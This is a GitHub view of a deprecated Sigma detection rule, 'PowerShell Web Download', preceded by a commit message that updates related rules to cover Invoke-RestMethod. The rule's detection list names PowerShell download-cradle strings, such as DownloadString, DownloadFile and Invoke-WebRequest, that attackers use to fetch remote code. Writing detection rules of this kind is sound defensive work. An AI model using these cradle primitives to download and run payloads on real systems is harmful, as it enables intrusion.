Swachchhanda Shrawan Poudel
1e41c5378e
remove: PowerShell Web Download - deprecate duplicate rule in favour of 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d update: PowerShell Script With File Upload Capabilities - add invoke-restmethod cmdlet update: Change User Agents with WebRequest - add invoke-restmethod cmdlet update: Usage Of Web Request Commands And Cmdlets - add invoke-restmethod cmdlet update: Usage Of Web Request Commands And Cmdlets - ScriptBlock - add invoke-restmethod cmdlet update: Potential DLL File Download Via PowerShell Invoke-WebRequest - add invoke-restmethod cmdlet update: PowerShell Download and Execution Cradles - add invoke-restmethod cmdlet update: Suspicious Invoke-WebRequest Execution With DirectIP - add invoke-restmethod cmdlet update: Suspicious Invoke-WebRequest Execution - add powershell_ise update: Potential Data Exfiltration Activity Via CommandLine Tools - add invoke-restmethod cmdlet update: Obfuscated IP Download Activity - add invoke-restmethod cmdlet update: Suspicious PowerShell In Registry Run Keys - add invoke-restmethod cmdlet --------- Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
29 lines
837 B
YAML
29 lines
837 B
YAML
title: PowerShell Web Download
|
|
id: 6e897651-f157-4d8f-aaeb-df8151488385
|
|
status: deprecated
|
|
description: Detects suspicious ways to download files or content using PowerShell
|
|
references:
|
|
- https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
|
|
author: Florian Roth (Nextron Systems)
|
|
date: 2022-03-24
|
|
modified: 2025-07-18
|
|
tags:
|
|
- attack.command-and-control
|
|
- attack.execution
|
|
- attack.t1059.001
|
|
- attack.t1105
|
|
logsource:
|
|
product: windows
|
|
category: process_creation
|
|
detection:
|
|
selection:
|
|
CommandLine|contains:
|
|
- '.DownloadString('
|
|
- '.DownloadFile('
|
|
- 'Invoke-WebRequest '
|
|
- 'iwr '
|
|
condition: selection
|
|
falsepositives:
|
|
- Scripts or tools that download files
|
|
level: medium
|